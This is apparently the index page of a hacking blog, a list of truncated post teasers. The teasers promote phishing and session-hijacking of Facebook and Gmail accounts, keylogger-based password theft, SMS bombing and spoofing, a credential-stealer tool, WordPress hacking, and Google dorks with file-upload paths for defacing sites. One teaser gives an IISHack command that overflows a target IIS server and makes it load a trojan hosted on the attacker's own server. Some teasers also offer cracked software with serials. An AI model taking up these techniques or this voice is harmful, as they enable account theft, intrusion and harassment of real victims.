SSH back door

Many times I'll be at a site where I need remote support from someone who is blocked on the outside by a company firewall. Few people realize that if you can get out to the world through a firewall, then it is relatively easy to open a hole so that the world can come into you. In its crudest form, this is called "poking a hole in the firewall." I'll call it an SSH back...

Read More

Session ID Analysis

In this tutorial we focus on session ID analysis. If you are not familiar with session ID’s I’ll do a quick explanation. HTTP is a stateless protocol, so it’s equivalent to walkie talkies or CB radios. You’ll send a request and wait for a reply, you don’t have a constantly open communication line as you would with a phone. So in order to emulate this open communication the HTTP protocol uses session ID’s, commonly known as cookies. These cookies are simply agreements between you and the web application that you are who you claim to be....

Read More

Speaking Leet : Language of Hackers

To speak leet, you more or less need to un-learn proper english. The history of leet goes back to the early days of online message boards, or forums, where users can post messages to carry on a threaded conversation. In an attempt to “Clean-Up” the language that users would sometimes post, admins added a filtering system to the message board which would replace restricted words with some type of alternative. For example, the word “crap” might become “crud.” It didn’t take people long to figure out that you could get around this filter simply...

Read More

How to find or remove the Virus ?

How to find or remove the Virus ? If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst. Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness. You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up...

Read More

Resetting Ubuntu 11.10 Password

Hey Guys, If you’ve forgotten your Ubuntu 11.10 Password you can reset it within minutes. I will tell you two methods to reset your Ubuntu Password. The first one is by booting it in recovery mode and second one is by using any Live OS. Let’s start with the recovery mode first as it takes less time and easy to do in comparison to the second one method: Boot up your Ubuntu. Press and Hold ‘Shift’ Key while the machine is booting. You...

Read More

Internet Access In Backtrack Virtual Machine

Hey Guys, I’ve found that some people are struggling hard to access internet in there backtrack virtual machine from their USB Modem, so today I am going to tell you how you can access internet in your virtual machine by your datacard. Open Network Adapter Settings ( Run -> ncpa.cpl ) Right Click on your USB Modem Adapter and go to properties. ...

Read More

Cracking Linux Password when Grub cannot be changed

in the previous post we learnt about cracking Linux Password using the Grub – Dropping to Single User Mode. However, if the Grub is password protected, then this method will not work. So in such cases, we can use the Linux Live CD to crack the Linux Password. Follow the below given steps to change the Linux Password, using the Linux Live CD. Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot me...

Read More

BackTrack 5 Released – The Most Advanced Linux Security Distribution & LiveCD

We have of course been following BackTrack since the very early days, way back in 2006 when it was just known as BackTrack – A merger between WHAX and Auditor.  They’ve come a long way and BackTrack is now a very polished and well rounded security distro, most of the others have dropped off the map leaving BackTrack as the giant in the security LiveCD space. The last major release was BackTrack Final 4 Released – Linux Security Distribution – back in January 2010. The BackTrack Dev team has worked furiously in the past months on...

Read More

How To Hack Facebook Account Using Wireshark

In this tutorial we will have out look on how you can hack facebook account using wireshark. First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, next this trick will work only on LAN with hub. It will also work on LAN with switch but you'll have to perform ARP poisoning, click on link to know more. Here surely I 'll not discus how to use wireshark please read our previous tutorials...

Read More

What Is Phishing

Here in this post we will discus a little about what is phishing. Please note what we are covering here is just basics and not a phishing tutorial. In phishing attack, an attacker creates a fake login page of a legitimate website and lures victim to login using it. The site under attack is known as phished site and the fake login page used for capturing or stealing information is known as phished page. To perform phishing attack an attacker...

Read More

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password . First of all open www.facebook.com in your web browser,...

Read More

JSON XSRF Attacks

Welcome to another episode of Cross Site Request Forgery Attacks on DEVILS BLOG ON SECURITY. In this post we will discus a little about JSON hacking. Now you might have question why we haven't covered JSON XSRF attacks along with other XSRF attacks. This question is little difficult to answer but here's my explanation. All other XSRF attacks usually depend on session management attacks in one or another way, directly or indirectly...

Read More

JSON XSRF Attacks

In our last post on JSON XSRF attacks we saw some basics about XSRF attacks. So now in this section we will have our look on how to find and exploit JSON vulnerability for attack. As told in previous post JSON vulnerability exists when JSON data transfer format is used instead of standard XML data transfer format and that happens only in AJAX based web applications so following are your steps to find out whether a site is vulnerable or...

Read More

SSL And TLS Attacks | SSL Man In The Middle

In our last post we discussed a little about attacking weak ciphers in this post we will have our look on how a Man In The Middle (MITM) attacks can be performed over SSL and TSL encrypted data transfer. The attack uses SSL strip developed by Moxie Marlin Spike with a ARP spoofing tool and a packet sniffer. The attack can be exclusively performed from UNIX and Linux based platforms hence I suggest you to use Dsniff. Practically SSL strip was developed to demonstrate how an attacker can lead visitors to visit his/her site from legitimate...

Read More

Cross Site Scripting (XSS) | The Basics

In this following post we will have some basic look over Cross Site Scripting. Cross site scripting is also known as XSS and many times people also abbreviate it as CSS (by the way CSS means Cascading Style Sheets). Commonly XSS is web application attack and not web server attack, it occurs in web application which accepts input without validation and sanitization resulting giving an attacker chance to run a malicious script. XSS vulnerability...

Read More

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt , and windows xp… -Basics- Opening a dos prompt -> Go to start and then execute and write cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] Ok in this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some...

Read More

Hack a Website Using Remote File Inclusion

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on i...

Read More

Google trick to find private pictures!

Maybe you are a "voyeur". Maybe you need some pictures for your school work. Of course you can go to a dedicated website where you can find lot of free pictures. But you can also dig some private pictures directories. Try this little code in Google, you may find lot of Non public pictures   Quote: intitle:index.of +"Indexed by Apache::Gallery" search by adding a word at the end, for examp...

Read More

Hack about 80% of every website out there

All right, You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc. You want to learn to hack, stop asking stupid questions. There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have : It's called Acunetix. Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses,...

Read More

Beaver's SMS Bomber Pro

Features Include: Full Feature List: Custom SMTP Server (Make Sure You Type It Right) Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself) Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send) Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings) Fixed XP GUI Issues Stop Bombing At Any Time Watch The Number Of SMS Sent In The Title Bar No Longer Freezes While Sending Added A Recent slave's Box...

Read More

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome. Without leaving your seat,you...

Read More

{Linux} Tips and Tricks

Are you a unix geek ? Here are both indispensible linux tips and tricks which are staleness for new and knowledgeable users alike.Lets change a aspect at them-More Linux Tips and tricks for geeks and newbies alike Hurrying up your alcoholic journeying Get faster file dealings by using 32-bit transfers on your cruel force Conscionable add the line:     hdparm -c3 /dev/hdX to a bootup script.If you use SuSE or remaining distros based on SYS ...

Read More

Learn How To Hack Web Servers

Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.   c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.   "IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with...

Read More

Speed Up Windows

Safely turn Off Windows Services To speed up Windows Some of the windows services starts with the windows eating up the memory. and if they are not used by you then you can stop them from starting with windows. You can re-enable them when you need it. To check the services program...goto start -> run ->type" services.msc " (without quotes) -> and hit enter. There will be a list of services...Some common services you can check and stop them according to your need...

Read More

Hack Gmail Accounts

Today i will explain you How to hack Gmail account step by step. In my previous article i have explained you the basic technique involved in hacking Gmail account or password but not explained that in extended way but today i will disclose you how the hackers really hack the gmail account or gmail password using fake pages or simply called Phish pages and the technique involved is called Phising. NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. DON'T...

Read More

RAR Password Recovery Magic 6.1.1.378 Full

  RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.RAR Password Recovery Magic has an easy to use interface. RAR Password Recovery Magic 6.1.1.378.Incl.Serial Download : | FileSonic | DepositFiles | Turbobit...

Read More

Send Sms From Friends MobileTo Any Number

Hello Friends, today i am sharing an awesome trick with you all. Today i will tell you how to send anonymous SMS i.e. How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful?? its simple it is helpful when you wanna prank your friends, enemies...

Read More

Hiren's Bootcd 12.0 + Keyboard Patch

Hiren's BootCD is a live CD containing various diagnostic programs such as partitioning agents, system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools, and many others for fixing various computer problems.[2] As it is a bootable CD, it can be useful even if the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities with similar functionality...

Read More

USB Disk Security v5.4.0.12 Final

USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This...

Read More

Reset Windows Password Advanced Edition v1.2.1.195 Retail

Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or ...

Read More

Registry Purify 5.14 Final

Registry Purify analyze and clean invalid entries in Windows registry, backup and restore entire registry in system file level, compact registry to gain efficiency. Main Features: ? New Scan Engine Registry Purify improves analyzing speed over 50% than normal algorithm by using new "SharpANA Engine". Meanwhile, "SharpANA Engine" reduces reading of hard disk evidently, which protects your hard disk effectively. The proper use of...

Read More

Protect Folder 3.2.1.0 Final

  Protect Folder 3.2.1.0 Full Version Encrypt your files and data on-the-fly with a secure password. Protect Folder provides on-the-fly protection of your files, folders and removable drives. No need to run anything to access encrypted folders. Just double-click on a protected folder and enter your password, and you can access your protected data completely transparently - exactly as you would access any other file or folde...

Read More

How to run JPG as an EXE

I have searched on this forum and have not found this method anywhere so I decided to post it. Note I have used this method for years and it works on every Windows OS. Requirements: Windows Your EXE. Step 1 : First things make a New Folder...

Read More

How to Enable Right Click in Websites

How to Enable Right Click in Websites You are probably sometimes tried to save images or copy the contents of the website that forbid their use of the right-click. Most websites use javascript to prohibit the use of the right-click , so to enable it you should disable the javascript. There are many ways to do ti , the simplest by my opinion is using Web Developer 1.1.9 , firefox add-on . 1) Downlaod Web Developer 1.1.9 Download it from...

Read More

How To Hack Websites And WebServers

Before you hack a system, you must decide what your goal is. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first. Download Tutorial How to Hack Webservers The most common goals are: 1. breaking into the system & taking the admin privileges. 2. gaining sensitive data, such as...

Read More

Manually Hide any file in JPEG

Hello Friends, today i will explain you how to hide any file behind the JPEG image manually that is without any software. Its a very easy trick and also very useful if you want to send information secretly to your friend. Also its different from stenography as it does hides text behind images or text behind mp3 files. Its universal, you can hide any file, virus or Trojan or anything behind image using this trick.  Things that you will need for this trick: 1. Winrar installed on your system. 2. Little knowledge of command...

Read More

Hack facebook password remortly

Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.So guys lets start hacking Facebook account or passwords....Steps to hack Facebook account using Keylogger:1....

Read More

Pesca 0.75 local stealer Ftp+Mail+Php Uploader + Php logger

Steals:* MSN Messenger* Windows Messenger* Windows Live Messenger* Yahoo Messenger (5.x and 6.x)* Google Talk* ICQ Lite 4.x/5.x/2003* AOL Instant Messenger (v4.6,6.x,Pro)* Trillian* Miranda* GAIM/Pidgin* MySpace IM* PaltalkScene* Outlook Express* Microsoft Outlook 2...

Read More

Mr.Dark Soul's Wordpress Blog Hacker

Its a Wordpress hacking software named  Mr.Dark Soul Wordpress Blog Hacker.its a Special Soft For Newbie who wanna hack WP blog .Scrreenshot is enough for teaching that how to use Mr.Dark Soul Wordpress Blog HackerClick On Images For Larger Size or its Image Links http://i.imgur.com/BCXFD.gifhttp://i.imgur.com/ywccU.gifhttp://i.imgur.com/dhn43.gifhttp://i.imgur.com/yJxc2.g...

Read More

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

So its a New Tut of Wordpress Blog Hacking,,, Lets Start ...Open Google.com and enter This Dorkinurl:"fbconnect_action=myhome"You will find many sites, Select the site which you are comfortable wit...

Read More

"Portail Dokeos" deface and Shell Upload vulnerability

Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerabilityin this vulnerability hacker can upload a shell. deface page or any file on website without admin username and passwordGoogle Dork : "Portail Dokeos 1.8.5"Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.ht...

Read More

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"open Google.com and type this dork intitle:"QuiXplorer 2.3 - the QuiX project" you'll see a lot of sites, some big websites are vuln too like haeward university website,select any website from search results Vulnerablity http://[localhost]/[path]/index.php?action=list&order=name&srt=yes http://site.com/[xyz]/index.php?action=list&order=name&srt=yes after...

Read More